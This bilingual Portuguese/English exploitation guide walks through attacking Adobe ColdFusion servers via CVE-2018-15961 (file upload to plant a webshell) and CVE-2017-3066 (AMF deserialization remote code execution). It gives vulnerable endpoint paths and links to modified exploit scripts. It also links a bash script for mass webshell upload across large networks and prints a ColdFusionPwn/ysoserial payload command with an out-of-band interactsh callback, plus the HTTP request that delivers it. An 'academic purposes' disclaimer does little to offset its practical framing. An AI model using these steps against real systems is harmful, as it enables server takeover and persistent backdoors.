PT-BR PAPER
neste paper irei mostrar como explorar O CVE-2018–15961 e CVE-2017–3066
endpoints web server coldfusion: cfc, cfm, cfml e outros
primeiro CVE: CVE-2018-15961** ############## entrypoint: /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm ############## reference exploit: https://github.com/xbufu/CVE-2018-15961
fiz algumas edições no exploit para fazer upload de uma webshell para linux e windows e automatizei o processo a baixo segue o POC de uso
linux.py: https://pastebin.com/raw/URCw5TN3
windows.py https://pastebin.com/raw/V8irZmh7
e criei um script simples feito em bash para automatização do upload da web shell isso é muito útil em casos da rede do alvo pentester for muito grande
vulns.sh https://pastebin.com/raw/SsrRSjix
chmod +x vulns.sh ./vulns.sh #divirta-se
############## Coldfusion AMF Deserialization CVE-2017-3066 ############## reference: https://github.com/vulhub/vulhub/blob/master/coldfusion/CVE-2017-3066/README.md
reference: https://github.com/codewhitesec/ColdFusionPwn
não se esqueça do ysoserial xD
entrypoint: flex2gateway/amf response: blank page dork: as mesmas que as anteriores
http://example.com/flex2gateway/amf testando RCE Blind para ver se ta vuln .. go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest rodar este comando no linux para baixar o interactsh depois rodar interactsh-client -v -o interactsh-logs.txt
geramos uma poc com a dns gerada do interactsh
exemplo:
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 "nslookup c7d125umno72mcpu9d50c8pbnfayyyyyn.interact.sh" poc
e executamos no alvo nosso payload
http post http://example.com/flex2gateway/amf Content-Type:application/x-amf < poc
################
apenas para fins academicos. Não se responsabilizo para atos ilegais.
Obrigado!
ENGLISH PAPER
in this paper will show you how to explore CVE-2018–15961 and CVE-2017–3066
coldfusion web server endpoints: cfc, cfm, cfml and others
first CVE: CVE-2018-15961 ############## entrypoint: /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm ############## reference exploit: https://github.com/xbufu/CVE-2018-15961
I made some edits to the exploit to upload a webshell for linux and windows and automated the process below follows the POC of use
linux.py: https://pastebin.com/raw/URCw5TN3
windows.py https://pastebin.com/raw/V8irZmh7
and I created a simple script made in bash to automate the web shell upload this is very useful in cases where the pentester target's network is very large
vulns.sh https://pastebin.com/raw/SsrRSjix
chmod +x vulns.sh ./vulns.sh #have fun
############## Coldfusion AMF Deserialization #### reference: https://github.com/vulhub/vulhub/blob/master/coldfusion/CVE-2017-3066/README.md
reference: https://github.com/codewhitesec/ColdFusionPwn
don't forget the ysoserial ;)
entrypoint: flex2gateway/amf blank page dork: the same as the previous ones
http://example.com/flex2gateway/amf testing RCE Blind to see if it's vuln .. go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest run this command on linux to download interactsh then rotate interactsh-client -v -o interactsh-logs.txt
we generate a poc with the dns generated from interactsh
example:
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 "nslookup c7d125umno72mcpu9d50c8pbnfayyyyyn.interact.sh" poc
and run our payload on the target
http post http://example.com/flex2gateway/amf Content-Type:application/x-amf < poc
################
for academic purposes only. I am not responsible for illegal acts.
Thanks!